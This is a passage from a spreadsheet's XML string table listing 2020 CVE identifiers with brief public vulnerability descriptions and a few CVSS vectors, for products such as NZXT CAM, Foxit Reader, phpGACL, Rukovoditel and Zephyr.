    <t>A privilege escalation vulnerability exists in the WinRing0x64 Driver Privileged I/O Write IRPs functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) can cause increased privileges. Using the IRP 0x9c40a0e0 gives a low privilege user direct access to the OUT instruction that is completely unrestrained at an elevated privilege level. An attacker can send a malicious IRP to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13515</t>
  </si>
  <si>
    <t>A privilege escalation vulnerability exists in the WinRing0x64 Driver IRP 0x9c40a148 functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) can cause an adversary to obtain elevated privileges. An attacker can send a malicious IRP to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13516</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in the WinRing0x64 Driver IRP 0x9c406144 functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) can cause the disclosure of sensitive information. An attacker can send a malicious IRP to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13517</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in the WinRing0x64 Driver IRP 0x9c406104 functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) can cause the disclosure of sensitive information. An attacker can send a malicious IRP to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13518</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in the WinRing0x64 Driver IRP 0x9c402084 functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) can cause the disclosure of sensitive information. An attacker can send a malicious IRP to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13519</t>
  </si>
  <si>
    <t>A privilege escalation vulnerability exists in the WinRing0x64 Driver IRP 0x9c402088 functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) can cause increased privileges. An attacker can send a malicious IRP to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-1352</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows USO Core Worker improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows USO Core Worker Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13520</t>
  </si>
  <si>
    <t>An out of bounds memory corruption vulnerability exists in the way Pixar OpenUSD 20.05 reconstructs paths from binary USD files. A specially crafted malformed file can trigger an out of bounds memory modification which can result in remote code execution. To trigger this vulnerability, victim needs to access an attacker-provided malformed file.</t>
  </si>
  <si>
    <t>CVE-2020-13522</t>
  </si>
  <si>
    <t>An exploitable arbitrary file delete vulnerability exists in SoftPerfect RAM Disk 4.1 spvve.sys driver. A specially crafted I/O request packet (IRP) can allow an unprivileged user to delete any file on the filesystem. An attacker can send a malicious IRP to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13523</t>
  </si>
  <si>
    <t>An exploitable information disclosure vulnerability exists in SoftPerfect’s RAM Disk 4.1 spvve.sys driver. A specially crafted I/O request packet (IRP) can cause the disclosure of sensitive information. An attacker can send a malicious IRP to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13524</t>
  </si>
  <si>
    <t>An out-of-bounds memory corruption vulnerability exists in the way Pixar OpenUSD 20.05 uses SPECS data from binary USD files. A specially crafted malformed file can trigger an out-of-bounds memory access and modification which results in memory corruption. To trigger this vulnerability, the victim needs to access an attacker-provided malformed file.</t>
  </si>
  <si>
    <t>CVE-2020-13525</t>
  </si>
  <si>
    <t>The sort parameter in the download page /sysworkflow/en/neoclassic/reportTables/reportTables_Ajax is vulnerable to SQL injection in ProcessMaker 3.4.11. A specially crafted HTTP request can cause an SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13526</t>
  </si>
  <si>
    <t>SQL injection vulnerability exists in the handling of sort parameters in ProcessMaker 3.4.11. A specially crafted HTTP request can cause an SQL injection. The reportTables_Ajax and clientSetupAjax pages are vulnerable to SQL injection in the sort parameter.An attacker can make an authenticated HTTP request to trigger these vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2020-13527</t>
  </si>
  <si>
    <t>An authentication bypass vulnerability exists in the Web Manager functionality of Lantronix XPort EDGE 3.0.0.0R11, 3.1.0.0R9, 3.4.0.0R12 and 4.2.0.0R7. A specially crafted HTTP request can cause increased privileges. An attacker can send an HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13528</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in the Web Manager and telnet CLI functionality of Lantronix XPort EDGE 3.0.0.0R11, 3.1.0.0R9, 3.4.0.0R12 and 4.2.0.0R7. A specially crafted HTTP request can cause information disclosure. An attacker can sniff the network to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13529</t>
  </si>
  <si>
    <t>An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H</t>
  </si>
  <si>
    <t>CVE-2020-1353</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1249, CVE-2020-1370, CVE-2020-1399, CVE-2020-1404, CVE-2020-1413, CVE-2020-1414, CVE-2020-1415, CVE-2020-1422.</t>
  </si>
  <si>
    <t>CVE-2020-13530</t>
  </si>
  <si>
    <t>A denial-of-service vulnerability exists in the Ethernet/IP server functionality of the EIP Stack Group OpENer 2.3 and development commit 8c73bf3. A large number of network requests in a small span of time can cause the running program to stop. An attacker can send a sequence of requests to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13531</t>
  </si>
  <si>
    <t>A use-after-free vulnerability exists in a way Pixar OpenUSD 20.08 processes reference paths textual USD files. A specially crafted file can trigger the reuse of a freed memory which can result in further memory corruption and arbitrary code execution. To trigger this vulnerability, the victim needs to open an attacker-provided malformed file.</t>
  </si>
  <si>
    <t>CVE-2020-13532</t>
  </si>
  <si>
    <t>A privilege escalation vulnerability exists in Dream Report 5 R20-2. In the default configuration, the Syncfusion Dashboard Service service binary can be replaced by attackers to escalate privileges to NT SYSTEM. An attacker can provide a malicious file to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13533</t>
  </si>
  <si>
    <t>A privilege escalation vulnerability exists in Dream Report 5 R20-2. IIn the default configuration, the following registry keys, which reference binaries with weak permissions, can be abused by attackers to effectively ‘backdoor’ the installation files and escalate privileges when a new user logs in and uses the application.</t>
  </si>
  <si>
    <t>CVE-2020-13534</t>
  </si>
  <si>
    <t>A privilege escalation vulnerability exists in Dream Report 5 R20-2. COM Class Identifiers (CLSID), installed by Dream Report 5 20-2, reference LocalServer32 and InprocServer32 with weak privileges which can lead to privilege escalation when used. An attacker can provide a malicious file to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13535</t>
  </si>
  <si>
    <t>A privilege escalation vulnerability exists in Kepware LinkMaster 3.0.94.0. In its default configuration, an attacker can globally overwrite service configuration to execute arbitrary code with NT SYSTEM privileges.</t>
  </si>
  <si>
    <t>CVE-2020-13536</t>
  </si>
  <si>
    <t>An exploitable local privilege elevation vulnerability exists in the file system permissions of Moxa MXView series 3.1.8 installation. Depending on the vector chosen, an attacker can either add code to a script or replace a binary. By default MXViewService, which starts as a NT SYSTEM authority user executes a series of Node.Js scripts to start additional application functionality.</t>
  </si>
  <si>
    <t>CVE-2020-13537</t>
  </si>
  <si>
    <t>An exploitable local privilege elevation vulnerability exists in the file system permissions of Moxa MXView series 3.1.8 installation. Depending on the vector chosen, an attacker can either add code to a script or replace a binary.By default MXViewService, which starts as a NT SYSTEM authority user executes a series of Node.Js scripts to start additional application functionality and among them the mosquitto executable is also run.</t>
  </si>
  <si>
    <t>CVE-2020-13539</t>
  </si>
  <si>
    <t>An exploitable local privilege elevation vulnerability exists in the file system permissions of the Win-911 Enterprise V4.20.13 install directory via “WIN-911 Mobile Runtime” service. Depending on the vector chosen, an attacker can overwrite various executables which could lead to escalation of the privileges when executed.</t>
  </si>
  <si>
    <t>CVE-2020-1354</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows UPnP Device Host Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1430.</t>
  </si>
  <si>
    <t>CVE-2020-13540</t>
  </si>
  <si>
    <t>An exploitable local privilege elevation vulnerability exists in the file system permissions of the Win-911 Enterprise V4.20.13 install directory via WIN-911 Account Change Utility. Depending on the vector chosen, an attacker can overwrite various executables which could lead to escalation of the privileges when executed.</t>
  </si>
  <si>
    <t>CVE-2020-13541</t>
  </si>
  <si>
    <t>An exploitable local privilege elevation vulnerability exists in the file system permissions of the Mobile-911 Server V2.5 install directory. Depending on the vector chosen, an attacker can overwrite the service executable and execute arbitrary code with System privileges or replace other files within the installation folder that could lead to local privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-13542</t>
  </si>
  <si>
    <t>A local privilege elevation vulnerability exists in the file system permissions of LogicalDoc 8.5.1 installation. Depending on the vector chosen, an attacker can either replace the service binary or replace DLL files loaded by the service, both which get executed by a service thus executing arbitrary commands with System privileges.</t>
  </si>
  <si>
    <t>CVE-2020-13543</t>
  </si>
  <si>
    <t>A code execution vulnerability exists in the WebSocket functionality of Webkit WebKitGTK 2.30.0. A specially crafted web page can trigger a use-after-free vulnerability which can lead to remote code execution. An attacker can get a user to visit a webpage to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13544</t>
  </si>
  <si>
    <t>An exploitable sign extension vulnerability exists in the TextMaker document parsing functionality of SoftMaker Office 2021’s TextMaker application. A specially crafted document can cause the document parser to sign-extend a length used to terminate a loop, which can later result in the loop’s index being used to write outside the bounds of a heap buffer during the reading of file data. An attacker can entice the victim to open a document to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13545</t>
  </si>
  <si>
    <t>An exploitable signed conversion vulnerability exists in the TextMaker document parsing functionality of SoftMaker Office 2021’s TextMaker application. A specially crafted document can cause the document parser to miscalculate a length used to allocate a buffer, later upon usage of this buffer the application will write outside its bounds resulting in a heap-based memory corruption. An attacker can entice the victim to open a document to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13546</t>
  </si>
  <si>
    <t>In SoftMaker Software GmbH SoftMaker Office TextMaker 2021 (revision 1014), a specially crafted document can cause the document parser to miscalculate a length used to allocate a buffer, later upon usage of this buffer the application will write outside its bounds resulting in a heap-based buffer overflow. An attacker can entice the victim to open a document to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13547</t>
  </si>
  <si>
    <t>A type confusion vulnerability exists in the JavaScript engine of Foxit Software’s Foxit PDF Reader, version 10.1.0.37527. A specially crafted PDF document can trigger an improper use of an object, resulting in memory corruption and arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13548</t>
  </si>
  <si>
    <t>In Foxit Reader 10.1.0.37527, a specially crafted PDF document can trigger reuse of previously free memory which can lead to arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13549</t>
  </si>
  <si>
    <t>An exploitable local privilege elevation vulnerability exists in the file system permissions of Sytech XL Reporter v14.0.1 install directory. Depending on the vector chosen, an attacker can overwrite service executables and execute arbitrary code with privileges of user set to run the service or replace other files within the installation folder, which would allow for local privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-1355</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory.An attacker who successfully exploited the vulnerability would gain execution on a victim system.The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory., aka 'Windows Font Driver Host Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13550</t>
  </si>
  <si>
    <t>A local file inclusion vulnerability exists in the installation functionality of Advantech WebAccess/SCADA 9.0.1. A specially crafted application can lead to information disclosure. An attacker can send an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13551</t>
  </si>
  <si>
    <t>An exploitable local privilege elevation vulnerability exists in the file system permissions of Advantech WebAccess/SCADA 9.0.1 installation. In privilege escalation via PostgreSQL executable, an attacker can either replace binary or loaded modules to execute code with NT SYSTEM privilege.</t>
  </si>
  <si>
    <t>CVE-2020-13552</t>
  </si>
  <si>
    <t>An exploitable local privilege elevation vulnerability exists in the file system permissions of Advantech WebAccess/SCADA 9.0.1 installation. In privilege escalation via multiple service executables in installation folder of WebAccess, an attacker can either replace binary or loaded modules to execute code with NT SYSTEM privilege.</t>
  </si>
  <si>
    <t>CVE-2020-13553</t>
  </si>
  <si>
    <t>An exploitable local privilege elevation vulnerability exists in the file system permissions of Advantech WebAccess/SCADA 9.0.1 installation. In webvrpcs Run Key Privilege Escalation in installation folder of WebAccess, an attacker can either replace binary or loaded modules to execute code with NT SYSTEM privilege.</t>
  </si>
  <si>
    <t>CVE-2020-13554</t>
  </si>
  <si>
    <t>CVE-2020-13555</t>
  </si>
  <si>
    <t>An exploitable local privilege elevation vulnerability exists in the file system permissions of Advantech WebAccess/SCADA 9.0.1 installation. In COM Server Application Privilege Escalation, an attacker can either replace binary or loaded modules to execute code with NT SYSTEM privilege.</t>
  </si>
  <si>
    <t>CVE-2020-13556</t>
  </si>
  <si>
    <t>An out-of-bounds write vulnerability exists in the Ethernet/IP server functionality of EIP Stack Group OpENer 2.3 and development commit 8c73bf3. A specially crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13557</t>
  </si>
  <si>
    <t>A use after free vulnerability exists in the JavaScript engine of Foxit Software’s Foxit PDF Reader, version 10.1.0.37527. A specially crafted PDF document can trigger reuse of previously free memory which can lead to arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13558</t>
  </si>
  <si>
    <t>A code execution vulnerability exists in the AudioSourceProviderGStreamer functionality of Webkit WebKitGTK 2.30.1. A specially crafted web page can lead to a use after free.</t>
  </si>
  <si>
    <t>CVE-2020-13559</t>
  </si>
  <si>
    <t>A denial-of-service vulnerability exists in the traffic-logging functionality of FreyrSCADA IEC-60879-5-104 Server Simulator 21.04.028. A specially crafted packet can lead to denial of service. An attacker can send a malicious packet to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-1356</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows iSCSI Target Service improperly handles file operations, aka 'Windows iSCSI Target Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13560</t>
  </si>
  <si>
    <t>CVE-2020-13561</t>
  </si>
  <si>
    <t>An out-of-bounds write vulnerability exists in the TIFF parser of Accusoft ImageGear 19.8. A specially crafted malformed file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13562</t>
  </si>
  <si>
    <t>A cross-site scripting vulnerability exists in the template functionality of phpGACL 3.3.7. A specially crafted HTTP request can lead to arbitrary JavaScript execution. An attacker can provide a crafted URL to trigger this vulnaerability in the phpGACL template action parameter.</t>
  </si>
  <si>
    <t>CVE-2020-13563</t>
  </si>
  <si>
    <t>A cross-site scripting vulnerability exists in the template functionality of phpGACL 3.3.7. A specially crafted HTTP request can lead to arbitrary JavaScript execution. An attacker can provide a crafted URL to trigger this vulnerability in the phpGACL template group_id parameter.</t>
  </si>
  <si>
    <t>CVE-2020-13564</t>
  </si>
  <si>
    <t>A cross-site scripting vulnerability exists in the template functionality of phpGACL 3.3.7. A specially crafted HTTP request can lead to arbitrary JavaScript execution. An attacker can provide a crafted URL to trigger this vulnerability in the phpGACL template acl_id parameter.</t>
  </si>
  <si>
    <t>CVE-2020-13565</t>
  </si>
  <si>
    <t>An open redirect vulnerability exists in the return_page redirection functionality of phpGACL 3.3.7, OpenEMR 5.0.2 and OpenEMR development version 6.0.0 (commit babec93f600ff1394f91ccd512bcad85832eb6ce). A specially crafted HTTP request can redirect users to an arbitrary URL. An attacker can provide a crafted URL to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13566</t>
  </si>
  <si>
    <t>SQL injection vulnerabilities exist in phpGACL 3.3.7. A specially crafted HTTP request can lead to a SQL injection. An attacker can send an HTTP request to trigger this vulnerability In admin/edit_group.php, when the POST parameter action is “Delete”, the POST parameter delete_group leads to a SQL injection.</t>
  </si>
  <si>
    <t>CVE-2020-13567</t>
  </si>
  <si>
    <t>Multiple SQL injection vulnerabilities exist in phpGACL 3.3.7. A specially crafted HTTP request can lead to a SQL injection. An attacker can send an HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13568</t>
  </si>
  <si>
    <t>SQL injection vulnerability exists in phpGACL 3.3.7. A specially crafted HTTP request can lead to a SQL injection. An attacker can send an HTTP request to trigger this vulnerability in admin/edit_group.php, when the POST parameter action is “Submit”, the POST parameter parent_id leads to a SQL injection.</t>
  </si>
  <si>
    <t>CVE-2020-13569</t>
  </si>
  <si>
    <t>A cross-site request forgery vulnerability exists in the GACL functionality of OpenEMR 5.0.2 and development version 6.0.0 (commit babec93f600ff1394f91ccd512bcad85832eb6ce). A specially crafted HTTP request can lead to the execution of arbitrary requests in the context of the victim. An attacker can send an HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-1357</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows System Events Broker improperly handles file operations, aka 'Windows System Events Broker Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13570</t>
  </si>
  <si>
    <t>A use-after-free vulnerability exists in the JavaScript engine of Foxit Software’s PDF Reader, version 10.1.0.37527. A specially crafted PDF document can trigger the reuse of previously free memory which can lead to arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13571</t>
  </si>
  <si>
    <t>An out-of-bounds write vulnerability exists in the SGI RLE decompression functionality of Accusoft ImageGear 19.8. A specially crafted malformed file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13572</t>
  </si>
  <si>
    <t>A heap overflow vulnerability exists in the way the GIF parser decodes LZW compressed streams in Accusoft ImageGear 19.8. A specially crafted malformed file can trigger a heap overflow, which can result in arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13573</t>
  </si>
  <si>
    <t>A denial-of-service vulnerability exists in the Ethernet/IP server functionality of Rockwell Automation RSLinx Classic 2.57.00.14 CPR 9 SR 3. A specially crafted network request can lead to a denial of service. An attacker can send a sequence of malicious packets to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13574</t>
  </si>
  <si>
    <t>A denial-of-service vulnerability exists in the WS-Security plugin functionality of Genivia gSOAP 2.8.107. A specially crafted SOAP request can lead to denial of service. An attacker can send an HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13575</t>
  </si>
  <si>
    <t>A denial-of-service vulnerability exists in the WS-Addressing plugin functionality of Genivia gSOAP 2.8.107. A specially crafted SOAP request can lead to denial of service. An attacker can send an HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13576</t>
  </si>
  <si>
    <t>A code execution vulnerability exists in the WS-Addressing plugin functionality of Genivia gSOAP 2.8.107. A specially crafted SOAP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13577</t>
  </si>
  <si>
    <t>CVE-2020-13578</t>
  </si>
  <si>
    <t>CVE-2020-13579</t>
  </si>
  <si>
    <t>An exploitable integer overflow vulnerability exists in the PlanMaker document parsing functionality of SoftMaker Office 2021’s PlanMaker application. A specially crafted document can cause the document parser perform arithmetic that may overflow which can result in an undersized heap allocation. Later when copying data from the file into this allocation, a heap-based buffer overflow will occur which can corrupt memory. These types of memory corruptions can allow for code execution under the context of the application. An attacker can entice the victim to open a document to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-1358</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows Resource Policy component improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Resource Policy Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13580</t>
  </si>
  <si>
    <t>An exploitable heap-based buffer overflow vulnerability exists in the PlanMaker document parsing functionality of SoftMaker Office 2021’s PlanMaker application. A specially crafted document can cause the document parser to explicitly trust a length from a particular record type and use it to write a 16-bit null relative to a buffer allocated on the stack. Due to a lack of bounds-checking on this value, this can allow an attacker to write to memory outside of the buffer and controllably corrupt memory. This can allow an attacker to earn code execution under the context of the application. An attacker can entice the victim to open a document to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13581</t>
  </si>
  <si>
    <t>In SoftMaker Software GmbH SoftMaker Office PlanMaker 2021 (Revision 1014), a specially crafted document can cause the document parser to copy data from a particular record type into a buffer that is smaller than the size used for the copy which will cause a heap-based buffer overflow. An attacker can entice the victim to open a document to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13582</t>
  </si>
  <si>
    <t>A denial-of-service vulnerability exists in the HTTP Server functionality of Micrium uC-HTTP 3.01.00. A specially crafted HTTP request can lead to denial of service. An attacker can send an HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13583</t>
  </si>
  <si>
    <t>CVE-2020-13584</t>
  </si>
  <si>
    <t>An exploitable use-after-free vulnerability exists in WebKitGTK browser version 2.30.1 x64. A specially crafted HTML web page can cause a use-after-free condition, resulting in a remote code execution. The victim needs to visit a malicious web site to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13585</t>
  </si>
  <si>
    <t>An out-of-bounds write vulnerability exists in the PSD Header processing functionality of Accusoft ImageGear 19.8. A specially crafted malformed file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13586</t>
  </si>
  <si>
    <t>A memory corruption vulnerability exists in the Excel Document SST Record 0x00fc functionality of SoftMaker Software GmbH SoftMaker Office PlanMaker 2021 (Revision 1014). A specially crafted malformed file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13587</t>
  </si>
  <si>
    <t>An exploitable SQL injection vulnerability exists in the "forms_fields_rules/rules" page of the Rukovoditel Project Management App 2.7.2. A specially crafted HTTP request can lead to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability, this can be done either with administrator credentials or through cross-site request forgery.</t>
  </si>
  <si>
    <t>CVE-2020-13588</t>
  </si>
  <si>
    <t>An exploitable SQL injection vulnerability exists in the ‘entities/fields’ page of the Rukovoditel Project Management App 2.7.2. The heading_field_id parameter in ‘‘entities/fields’ page is vulnerable to authenticated SQL injection. An attacker can make authenticated HTTP requests to trigger this vulnerability, this can be done either with administrator credentials or through cross-site request forgery.</t>
  </si>
  <si>
    <t>CVE-2020-13589</t>
  </si>
  <si>
    <t>An exploitable SQL injection vulnerability exists in the ‘entities/fields’ page of the Rukovoditel Project Management App 2.7.2. The entities_id parameter in the 'entities/fields page (mulitple_edit or copy_selected or export function) is vulnerable to authenticated SQL injection. An attacker can make authenticated HTTP requests to trigger this vulnerability, this can be done either with administrator credentials or through cross-site request forgery.</t>
  </si>
  <si>
    <t>CVE-2020-1359</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Cryptography Next Generation (CNG) Key Isolation service improperly handles memory, aka 'Windows CNG Key Isolation Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1384.</t>
  </si>
  <si>
    <t>CVE-2020-13590</t>
  </si>
  <si>
    <t>Multiple exploitable SQL injection vulnerabilities exist in the 'entities/fields' page of the Rukovoditel Project Management App 2.7.2. A specially crafted HTTP request can lead to SQL injection. An attacker can make authenticated HTTP requests to trigger these vulnerabilities, this can be done either with administrator credentials or through cross-site request forgery.</t>
  </si>
  <si>
    <t>CVE-2020-13591</t>
  </si>
  <si>
    <t>An exploitable SQL injection vulnerability exists in the "access_rules/rules_form" page of the Rukovoditel Project Management App 2.7.2. A specially crafted HTTP request can lead to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability, this can be done either with administrator credentials or through cross-site request forgery.</t>
  </si>
  <si>
    <t>CVE-2020-13592</t>
  </si>
  <si>
    <t>An exploitable SQL injection vulnerability exists in "global_lists/choices" page of the Rukovoditel Project Management App 2.7.2. A specially crafted HTTP request can lead to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability, this can be done either with administrator credentials or through cross-site request forgery.</t>
  </si>
  <si>
    <t>CVE-2020-13593</t>
  </si>
  <si>
    <t>The Bluetooth Low Energy Secure Manager Protocol (SMP) implementation in Texas Instruments SimpleLink SIMPLELINK-CC2640R2-SDK through 2.2.3 allows the Diffie-Hellman check during the Secure Connection pairing to be skipped if the Link Layer encryption setup is performed earlier. An attacker in radio range can achieve arbitrary read/write access to protected GATT service data, cause a denial of service, or possibly control a device's function by establishing an encrypted session with an unauthenticated Long Term Key (LTK).</t>
  </si>
  <si>
    <t>CVE-2020-13594</t>
  </si>
  <si>
    <t>The Bluetooth Low Energy (BLE) controller implementation in Espressif ESP-IDF 4.2 and earlier (for ESP32 devices) does not properly restrict the channel map field of the connection request packet on reception, allowing attackers in radio range to cause a denial of service (crash) via a crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-13595</t>
  </si>
  <si>
    <t>The Bluetooth Low Energy (BLE) controller implementation in Espressif ESP-IDF 4.0 through 4.2 (for ESP32 devices) returns the wrong number of completed BLE packets and triggers a reachable assertion on the host stack when receiving a packet with an MIC failure. An attacker within radio range can silently trigger the assertion (which disables the target's BLE stack) by sending a crafted sequence of BLE packets.</t>
  </si>
  <si>
    <t>CVE-2020-13596</t>
  </si>
  <si>
    <t>An issue was discovered in Django 2.2 before 2.2.13 and 3.0 before 3.0.7. Query parameters generated by the Django admin ForeignKeyRawIdWidget were not properly URL encoded, leading to a possibility of an XSS attack.</t>
  </si>
  <si>
    <t>CVE-2020-13597</t>
  </si>
  <si>
    <t>Clusters using Calico (version 3.14.0 and below), Calico Enterprise (version 2.8.2 and below), may be vulnerable to information disclosure if IPv6 is enabled but unused. A compromised pod with sufficient privilege is able to reconfigure the node’s IPv6 interface due to the node accepting route advertisement by default, allowing the attacker to redirect full or partial network traffic from the node to the compromised pod.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N</t>
  </si>
  <si>
    <t>CVE-2020-13598</t>
  </si>
  <si>
    <t>FS: Buffer Overflow when enabling Long File Names in FAT_FS and calling fs_stat. Zephyr versions &gt;= v1.14.2, &gt;= v2.3.0 contain Stack-based Buffer Overflow (CWE-121). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-7fhv-rgxr-x56h</t>
  </si>
  <si>
    <t>CVE-2020-13599</t>
  </si>
  <si>
    <t>Security problem with settings and littlefs. Zephyr versions &gt;= 1.14.2, &gt;= 2.3.0 contain Incorrect Default Permissions (CWE-276). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-5qhg-j6wc-4f6q</t>
  </si>
  <si>
    <t>CVE-2020-1360</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Profile Service improperly handles file operations, aka 'Windows Profile Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13600</t>
  </si>
  <si>
    <t>Malformed SPI in response for eswifi can corrupt kernel memory. Zephyr versions &gt;= 1.14.2, &gt;= 2.3.0 contain Heap-based Buffer Overflow (CWE-122). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-hx4p-j86p-2mhr</t>
  </si>
  <si>
    <t>CVE-2020-13601</t>
  </si>
  <si>
    <t>Possible read out of bounds in dns read. Zephyr versions &gt;= 1.14.2, &gt;= 2.3.0 contain Out-of-bounds Read (CWE-125). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-mm57-9hqw-qh44</t>
  </si>
  <si>
    <t>CVE-2020-13602</t>
  </si>
  <si>
    <t>Remote Denial of Service in LwM2M do_write_op_tlv. Zephyr versions &gt;= 1.14.2, &gt;= 2.2.0 contain Improper Input Validation (CWE-20), Loop with Unreachable Exit Condition ('Infinite Loop') (CWE-835). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-g9mg-fj58-6fqh</t>
  </si>
  <si>
    <t>CVE-2020-13603</t>
  </si>
  <si>
    <t>Integer Overflow in memory allocating functions. Zephyr versions &gt;= 1.14.2, &gt;= 2.4.0 contain Integer Overflow or Wraparound (CWE-190). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-94vp-8gc2-rm45</t>
  </si>
  <si>
